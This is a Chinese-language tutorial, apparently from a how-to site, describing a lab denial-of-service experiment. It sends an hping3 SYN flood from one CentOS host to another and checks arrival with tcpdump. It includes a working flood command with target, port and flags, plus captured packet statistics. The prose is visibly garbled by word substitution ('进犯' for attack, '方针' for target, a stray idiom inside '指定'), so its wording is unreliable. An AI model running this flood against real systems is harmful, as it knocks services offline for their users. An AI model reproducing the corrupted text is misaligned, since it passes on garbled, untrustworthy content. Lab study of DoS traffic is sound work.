hping3工具DOS攻击实验

本次尝试是利用hping3，模拟进犯源进犯方针机械，利用的是虚拟化情况，利用少量的收集带宽模拟进犯，方针机械抓取数据包，阐发收集数据包是否能达到，本次尝试收集情况是统一个网段。

东西/原料

• centos7.x系统
• tcpdump抓包软件
• hping3软件

方式/步调

1. 1

   需要两台机械，一台饰演进犯源，另一做方针源。

   进犯源地址:10.0.40.4

   被进犯机械地址:10.0.40.246

   
2. 2

   被进犯的机械上安装tcpdump，tcpdump本家儿如果用来抓包的，看看收集数据包是否达到。

   $ yum install tcpdump -y 

   
3. 3

   起首开启tcpdump抓取来自进犯源的数据包，其他数据包应该过解除。

   $ tcpdump -i eth0  src host 10.0.40.4

   -i 是选择哪个网卡

   src 是源地址 

   
4. 4

   利用hping3进行DoS进犯：

   $ hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 10.0.40.246

   -c：发送数据包的个数

   -d：每个数据包的巨细

   -S：发送SYN数据包

   -w：TCP window巨细

   -p：方针端口，你可以指心猿意马肆意端口

   –flood：尽可能快的发送数据包

   0安装教程

   
5. 5

   180649 packets captured  是经由pcap_loop, 或 pcap_dispatch 或 pcap_next，把包交给回调处置过的包的数目。

   11042651 packets received by filter  是tcpdump从内核中拿到的且匹配号令上行指心猿意马的过滤前提的包。

   10862001 packets dropped by kernel   这两个数字的差值是tcpdump抓到的，还来不及处置的包。

   颠末我计较

   11042651-180649=10862002 

   10862002 和10862001  差一个包，具体我还没有去寻找谜底。

   
6. 6

   我们再回来看看进犯机源机械，利用号令进行进犯后，我们看到有8523004 packets tramitted, 0 packets received, 100% packet loss。数据包传给对方后没有回显，可是10.0.40.246被进犯机械简直是收到了我们的数据包了。

   
7. 7

   总结：

   hping3东西利用源地址的机械flood进犯，固然显示本身ip给对方，可是源地址的机械不会领受回显，处置完毕后，所有的数据包全数loss状况。

   

注重事项

• 禁止利用hping3东西进行不法勾当。